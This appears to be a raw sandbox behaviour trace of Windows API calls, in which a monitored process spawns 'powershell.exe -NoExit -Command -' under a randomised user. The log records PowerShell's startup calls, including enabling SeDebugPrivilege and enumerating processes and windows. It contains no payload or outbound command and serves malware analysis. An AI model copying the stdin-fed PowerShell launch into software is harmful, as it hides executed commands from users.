CloseHandle (hObject=0x100) returned 1 [0084.259] VirtualAlloc (lpAddress=0xc000182000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000182000 [0084.259] VirtualAlloc (lpAddress=0xc000188000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000188000 [0084.260] CryptGenRandom (in: hProv=0x8024b0, dwLen=0xc, pbBuffer=0xc0000a2490 | out: pbBuffer=0xc0000a2490) returned 1 [0084.260] CryptGenRandom (in: hProv=0x8024b0, dwLen=0xc, pbBuffer=0xc0000a24a0 | out: pbBuffer=0xc0000a24a0) returned 1 [0084.260] WriteFile (in: hFile=0xd4, lpBuffer=0xc000185600*, nNumberOfBytesToWrite=0xd13, lpNumberOfBytesWritten=0xc0000cba14, lpOverlapped=0x0 | out: lpBuffer=0xc000185600*, lpNumberOfBytesWritten=0xc0000cba14*=0xd13, lpOverlapped=0x0) returned 1 [0084.261] SetEvent (hEvent=0x84) returned 1 [0084.261] ReadFile (in: hFile=0x104, lpBuffer=0xc0000ba940, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00015dddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000ba940, lpNumberOfBytesRead=0xc00015dddc*=0x0, lpOverlapped=0x0) returned 0 [0223.092] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) Thread: id = 5 os_tid = 0x1c4 [0053.682] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x27fcfea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x27fcfea0*=0xa8) returned 1 [0053.682] VirtualQuery (in: lpAddress=0x27fcfec0, lpBuffer=0x27fcfec0, dwLength=0x30 | out: lpBuffer=0x27fcfec0*(BaseAddress=0x27fcf000, AllocationBase=0x27dd0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0053.682] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac [0053.682] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0053.682] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0xffffffff) returned 0x0 [0053.774] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0xffffffff) Thread: id = 7 os_tid = 0xae8 [0054.629] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2849fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2849fea0*=0xe4) returned 1 [0054.629] VirtualQuery (in: lpAddress=0x2849fec0, lpBuffer=0x2849fec0, dwLength=0x30 | out: lpBuffer=0x2849fec0*(BaseAddress=0x2849f000, AllocationBase=0x282a0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0054.629] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8 [0054.629] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0054.630] WaitForSingleObject (hHandle=0xd8, dwMilliseconds=0xffffffff) Thread: id = 8 os_tid = 0xa14 [0054.630] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2869fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2869fea0*=0xe8) returned 1 [0054.630] VirtualQuery (in: lpAddress=0x2869fec0, lpBuffer=0x2869fec0, dwLength=0x30 | out: lpBuffer=0x2869fec0*(BaseAddress=0x2869f000, AllocationBase=0x284a0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0054.630] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xec [0054.630] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf8 [0054.630] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0084.267] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0084.336] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0113.131] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0118.041] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0123.301] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0127.737] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0130.216] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0136.183] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0145.696] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0149.677] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0154.589] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0158.876] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0162.775] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0166.179] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0170.600] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0172.465] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0173.839] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0178.224] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0181.209] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0184.736] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0186.226] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0187.519] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0189.022] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0190.337] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0191.463] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0194.554] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0195.878] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0197.330] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0198.614] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0199.554] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0201.438] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0202.221] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0202.251] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0203.096] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0203.446] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x37a49000" os_pid = "0x5f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xad8" cmd_line = "powershell.exe -NoExit -Command -" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0x5e4 [0063.731] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0064.141] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0064.142] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0064.142] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0064.142] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0064.745] GetVersionExW (in: lpVersionInformation=0x12db80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12db80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0064.747] GetVersionExW (in: lpVersionInformation=0x12db80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12db80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0064.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.760] GetVersionExW (in: lpVersionInformation=0x12d8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0064.761] SetErrorMode (uMode=0x1) returned 0x1 [0064.762] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12da50 | out: lpFileInformation=0x12da50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0064.763] SetErrorMode (uMode=0x1) returned 0x1 [0064.766] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dcc0 | out: lpdwHandle=0x12dcc0) returned 0x94c [0064.768] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cd6fd8 | out: lpData=0x2cd6fd8) returned 1 [0064.770] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dc38, puLen=0x12dc30 | out: lplpBuffer=0x12dc38*=0x2cd7074, puLen=0x12dc30) returned 1 [0064.773] lstrlenW (lpString="䅁") returned 1 [0064.784] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd7150, puLen=0x12dba0) returned 1 [0064.785] lstrlenW (lpString="Microsoft Corporation") returned 21 [0064.804] CoTaskMemAlloc (cb=0x2e) returned 0x2c2a40 [0064.804] lstrcpyW (in: lpString1=0x2c2a40, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0064.805] CoTaskMemFree (pv=0x2c2a40) [0064.805] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd71a4, puLen=0x12dba0) returned 1 [0064.805] lstrlenW (lpString="System.Management.Automation") returned 28 [0064.805] CoTaskMemAlloc (cb=0x3c) returned 0x2c3e40 [0064.805] lstrcpyW (in: lpString1=0x2c3e40, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0064.805] CoTaskMemFree (pv=0x2c3e40) [0064.805] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd7200, puLen=0x12dba0) returned 1 [0064.805] lstrlenW (lpString="6.1.7601.17514") returned 14 [0064.805] CoTaskMemAlloc (cb=0x20) returned 0x2c9aa0 [0064.805] lstrcpyW (in: lpString1=0x2c9aa0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0064.805] CoTaskMemFree (pv=0x2c9aa0) [0064.805] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd7240, puLen=0x12dba0) returned 1 [0064.805] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0064.805] CoTaskMemAlloc (cb=0x44) returned 0x2c3e40 [0064.805] lstrcpyW (in: lpString1=0x2c3e40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0064.805] CoTaskMemFree (pv=0x2c3e40) [0064.805] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd72a8, puLen=0x12dba0) returned 1 [0064.805] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0064.805] CoTaskMemAlloc (cb=0x76) returned 0x2696e0 [0064.805] lstrcpyW (in: lpString1=0x2696e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0064.805] CoTaskMemFree (pv=0x2696e0) [0064.805] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd7344, puLen=0x12dba0) returned 1 [0064.805] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0064.805] CoTaskMemAlloc (cb=0x44) returned 0x2c3e40 [0064.805] lstrcpyW (in: lpString1=0x2c3e40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0064.806] CoTaskMemFree (pv=0x2c3e40) [0064.806] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd73a8, puLen=0x12dba0) returned 1 [0064.806] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0064.806] CoTaskMemAlloc (cb=0x58) returned 0x22eea0 [0064.806] lstrcpyW (in: lpString1=0x22eea0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0064.806] CoTaskMemFree (pv=0x22eea0) [0064.806] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd7424, puLen=0x12dba0) returned 1 [0064.806] lstrlenW (lpString="6.1.7601.17514") returned 14 [0064.806] CoTaskMemAlloc (cb=0x20) returned 0x2c9aa0 [0064.806] lstrcpyW (in: lpString1=0x2c9aa0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0064.806] CoTaskMemFree (pv=0x2c9aa0) [0064.806] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cd70cc, puLen=0x12dba0) returned 1 [0064.806] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0064.806] CoTaskMemAlloc (cb=0x66) returned 0x23ecd0 [0064.806] lstrcpyW (in: lpString1=0x23ecd0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0064.806] CoTaskMemFree (pv=0x23ecd0) [0064.806] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x0, puLen=0x12dba0) returned 0 [0064.806] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x0, puLen=0x12dba0) returned 0 [0064.806] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x0, puLen=0x12dba0) returned 0 [0064.806] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db78, puLen=0x12db70 | out: lplpBuffer=0x12db78*=0x2cd7074, puLen=0x12db70) returned 1 [0064.807] CoTaskMemAlloc (cb=0x204) returned 0x282860 [0064.807] VerLanguageNameW (in: wLang=0x0, szLang=0x282860, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0064.809] CoTaskMemFree (pv=0x282860) [0064.809] VerQueryValueW (in: pBlock=0x2cd6fd8, lpSubBlock="\\", lplpBuffer=0x12dbc8, puLen=0x12dbc0 | out: lplpBuffer=0x12dbc8*=0x2cd7000, puLen=0x12dbc0) returned 1 [0064.815] GetCurrentProcessId () returned 0x5f4 [0064.830] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12caf0 | out: lpLuid=0x12caf0*(LowPart=0x14, HighPart=0)) returned 1 [0064.833] GetCurrentProcess () returned 0xffffffffffffffff [0064.834] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cb10 | out: TokenHandle=0x12cb10*=0x2fc) returned 1 [0064.835] AdjustTokenPrivileges (in: TokenHandle=0x2fc, DisableAllPrivileges=0, NewState=0x2cda850*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0064.836] CloseHandle (hObject=0x2fc) returned 1 [0064.840] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5f4) returned 0x2fc [0064.852] EnumProcessModules (in: hProcess=0x2fc, lphModule=0x2cda8b8, cb=0x200, lpcbNeeded=0x12db28 | out: lphModule=0x2cda8b8, lpcbNeeded=0x12db28) returned 1 [0064.855] GetModuleInformation (in: hProcess=0x2fc, hModule=0x13f770000, lpmodinfo=0x2cdab28, cb=0x18 | out: lpmodinfo=0x2cdab28*(lpBaseOfDll=0x13f770000, SizeOfImage=0x77000, EntryPoint=0x13f77c63c)) returned 1 [0064.856] CoTaskMemAlloc (cb=0x804) returned 0x2cbc60 [0064.856] GetModuleBaseNameW (in: hProcess=0x2fc, hModule=0x13f770000, lpBaseName=0x2cbc60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0064.856] CoTaskMemFree (pv=0x2cbc60) [0064.857] CoTaskMemAlloc (cb=0x804) returned 0x2cbc60 [0064.857] GetModuleFileNameExW (in: hProcess=0x2fc, hModule=0x13f770000, lpFilename=0x2cbc60, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0064.857] CoTaskMemFree (pv=0x2cbc60) [0064.858] CloseHandle (hObject=0x2fc) returned 1 [0064.865] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x5f4) returned 0x2fc [0064.866] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x12dc58 | out: lpExitCode=0x12dc58*=0x103) returned 1 [0064.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cdb088, Length=0x20000, ResultLength=0x12dc20 | out: SystemInformation=0x12cdb088, ResultLength=0x12dc20*=0x11658) returned 0x0 [0064.893] EnumWindows (lpEnumFunc=0x29566ac, lParam=0x0) returned 0 [0064.894] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x538 [0064.894] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.895] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.895] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.895] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x514 [0064.895] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.895] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x778 [0064.895] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x778 [0064.895] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.895] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.895] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.895] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.896] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.896] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.896] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.896] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.896] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.896] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x458 [0064.896] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.896] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x4ac [0064.896] GetWindowThreadProcessId (in: hWnd=0x30270, lpdwProcessId=0x12d980 | out: lpdwProcessId=0x12d980) returned 0x5e4 [0064.897] GetWindow (hWnd=0x30270, uCmd=0x4) returned 0x0 [0064.898] IsWindowVisible (hWnd=0x30270) returned 1 [0064.901] WerSetFlags () returned 0x0 [0064.909] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0064.910] CoTaskMemFree (pv=0x0) [0064.910] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dce0 | out: pulNumLanguages=0x12dce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dce0) returned 1 [0064.911] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dce8, pwszLanguagesBuffer=0x2d01a98, pcchLanguagesBuffer=0x12dce0 | out: pulNumLanguages=0x12dce8, pwszLanguagesBuffer=0x2d01a98, pcchLanguagesBuffer=0x12dce0) returned 1 [0064.917] CoTaskMemAlloc (cb=0x24) returned 0x2c9bf0 [0064.917] GetUserDefaultLocaleName (in: lpLocaleName=0x2c9bf0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0064.917] CoTaskMemFree (pv=0x2c9bf0) [0064.939] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0064.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.939] CoTaskMemFree (pv=0x22fde0) [0064.942] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0064.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.942] CoTaskMemFree (pv=0x22fde0) [0064.944] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0064.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.944] CoTaskMemFree (pv=0x22fde0) [0064.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.954] SetErrorMode (uMode=0x1) returned 0x1 [0064.954] 